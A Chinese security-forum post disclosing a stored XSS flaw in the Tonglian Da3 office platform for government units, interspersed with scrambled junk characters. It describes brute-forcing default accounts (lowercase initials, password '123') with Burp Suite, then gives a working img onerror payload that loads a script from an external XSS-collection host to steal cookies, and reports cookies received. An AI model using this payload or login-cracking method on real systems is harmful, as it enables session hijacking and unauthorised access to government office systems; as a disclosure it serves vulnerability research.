找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1434|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台后台通用储存型xss漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:14:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
7 X+ v4 i- t' z$ I# } , K: N% `4 g" P ( S- f5 ]& ^4 p8 \9 z2 D$ N$ x) r# ]* C7 Y% d5 | * |: B4 `, Y: t+ b+ ^) z* ]! a- ~3 x6 [) j + e* d, `( f$ y5 F) ` ; r- o$ \2 O2 f% ?8 F * G6 _5 R+ `6 E _# _9 y, J * j( s0 m4 K* d9 Z ' l, u3 o" N) I2 q + V d2 U" X O9 |$ _8 j ( B: a9 U0 L# b: h6 |
. c% s2 J q5 n3 G3 D

; b* o& [1 }1 R1 g( y7 H 同联Da3协同办公平台后台通用储存型xss漏洞6 ] s# [, S( ]* S( ]9 V

1 J# l& t* |" Y- M

) u# A/ h: m: r# ~6 J1 ~8 m 平台简介:* |( j8 L+ A4 |. ?3 [1 [# w

2 S1 r0 R/ _7 y- ^/ ?7 f0 i; A' U

5 R: y& \# s# `6 l' t   5 w4 {2 U, ?/ `7 c

* b% d4 t g: R/ |

" O! x8 O- t9 I H) g 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
: ?& F' y9 L% ~9 Q5 z# O同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
1 M& a) y, b; V2 | v 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!: ~% ^9 U% T, o+ u/ R# \: z4 b

* S$ Z" U, d3 \0 X; ]2 ^ u# N7 b

4 W8 _- |: r5 v- q3 }" {  # T- o0 ^! B6 l/ L. T% W( |1 H0 |

0 g- [ e2 P3 C, L( o: t

% a- B( O( e0 w( M0 K4 ] 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:7 [6 ?2 ^4 f/ f! \8 L. J2 U

: R( _% _8 ]/ b4 q+ S6 ~# T

8 y8 J0 W% f0 G  ; o9 L- D j8 K. }

3 O7 ?- S* f+ }7 E

8 w$ x9 g* ^9 f3 z: F* E# s http://1.1.1.1:7197/cap-aco/#(案例2-) 3 z( M6 f. k' w7 h# j: q

+ [4 r7 ^" G N! f }& t, h/ @/ y

0 g- { d6 M9 \0 F. l# }1 E http://www.XXOO.com (案例1-官网网站) 7 D; T% A* R4 z, H# s. v

, \1 y* Q2 z$ f! w5 T6 d. M

" R& U& S5 ?. U4 S) N6 t' X, K 漏洞详情: 9 l% P8 r2 [$ w( x% M: u+ h8 K

6 U6 a3 [* b3 Q4 W8 U0 s0 s

- {& w, C2 o# z7 r3 ^9 D3 ]% p2 c  案例一、* Q) p! ]# E5 m( _

; @2 l4 S; P0 x2 x

; A2 C% j, t: L5 m, f, ~& z$ z 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 # j. I) N# a# x. ^( G# }3 Y

+ |9 s9 k, Y% N" F5 W

4 o( n$ f# J8 ~0 A0 C% E6 Z. {      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:4 n0 w7 A& D8 l. b6 {; w5 }' w6 x

2 M* O9 M) P+ ?/ G% `1 p* O

5 b4 l% S, _/ f$ y- G4 `4 q! a   4 f3 |6 c J y' a7 } ?

1 x- I3 s2 w" m0 X) X, {3 C- W

! [; n1 u4 e* l+ ?! N* I IMG_256 : f/ n5 x* n( D3 Y

6 P: H# o' }" i: @( t! a4 B3 j

`; U9 v7 d' x status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: & X, l/ p4 ]4 c$ e1 `. d+ ]3 B

, x5 V8 D6 ]: i! w; a, E

7 F" e( |! d }( i. s3 S" y& V8 f   * c+ s y `3 ~; k$ y! e

2 d: j C6 k- t4 I& h

$ x4 h7 K4 T# x l/ V/ [1 P" t: B0 G9 o

3 M& w( p9 y, q* u+ @( c

. r" ^! ^6 j; C" v: |( x3 e 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 % s! b1 A' @3 [, F4 i

5 a1 \ o: t, j& U) q4 k% P

% |7 F" p3 r' f2 Y6 a+ }   & N' [) A/ p; i+ K1 n) V% \# v

. L! }* y6 I/ n3 z( W+ A( D

4 Y! x' J) o5 L, N <img src=x , U' p; D5 S5 E* Qonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: - E5 B$ f4 y; M& G- M7 T

. b% g9 x, C+ ^1 C. a, g+ G3 j! W1 j( ^# W

5 `/ \3 q0 J9 f% b+ ~: p V % m, H3 {$ |' |+ c" V' ^

* |' ?0 x" V4 L% L

9 O5 h) @& A3 z( t# _% P/ | 然后发送,接收cookie如图: : N+ U* h" S5 l' R9 K, y0 j

& \; P l# I& f1 p8 O8 P: h# \

. f, q$ Q, t' d6 ^   $ e* |; i' d: L% Q7 u* B

; a1 h$ C/ X( k- t3 M5 g& V, o

* Q2 l" o& h$ Y" }9 u   ) k( v# X! W' b5 F, g

& x0 j$ A3 Q4 r4 _

+ l5 B% A2 J: ?, d   , D6 ` G6 Q$ v+ K$ d7 ^- U

$ G- J: ^* x4 K/ Y

/ }* T# U* l X- u6 F" g9 v& l   ; h2 P2 t( m6 i1 g

. s: E& Y% Q+ n: Q& c2 `

" B- @0 J) ?- I8 ~! z' R 6 E/ z$ G* N7 x4 w

7 z) o5 {; ]6 J# h: F* w6 u

, g6 X0 i, |9 M! T) i 4 N% Z. W1 ]" H3 o# J' s2 _

# i6 e k% V4 v6 W& v- T

( D# A# M. H( _8 V; \4 g   $ L0 n3 f5 q, E- G2 `- Q

* n( }( P4 U/ C: j

( R6 D Q$ L- N! R p) P 案例2、 # f; c q @; m0 g3 [- f

1 x* E+ { a6 C& O2 F

% C" o8 I. r2 u) l- B 前面步骤都一样,下面看效果图: $ e+ `1 Y7 E. ?

- \+ W5 a& e4 a) J& S9 S

/ M# u4 `7 K0 w9 v( V9 ] 3 ^: n& D' H) Q" M+ ^" a

; P6 s$ L2 M" Y' j [$ |

1 m Y; I; S) r4 b1 } ! r7 b7 s1 V7 h8 |8 S0 @

1 B) s. \# m/ F0 c3 F& i- S+ x

% H% P1 G2 J- f7 i# O; ^, m& g8 C: y! `   # M% Q( M3 H+ C2 n

" _- }1 V$ `) ~& }

& ?2 A3 U4 ?0 M# C   , q# V. I% j5 z: @* l/ ~

# d) M+ ?6 L: n! H( \

4 p. g. T& f) b" { ( d) B* e- _) L. f/ V( l: |

4 n" l& m! V! Y ]

3 n% p" Q8 m" _, _3 a O   / S7 t4 }% t. a" j" K+ ?0 \

9 Y+ k9 m; {5 {7 a) Z

0 l8 q; y S1 R" i, h( K7 F" u   4 ?( a( T$ R i* r X

|, Y0 U0 T; Y

+ O2 s; D5 ?6 ]. a   # \3 O6 M1 g* g3 Q- Q# p& \

8 `/ q% m% v* j: c

2 M/ B3 H. H( l* J$ y% q6 ]* S   . k& x" k& c4 F! a

( p: P: L+ j6 c; D: ?. G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表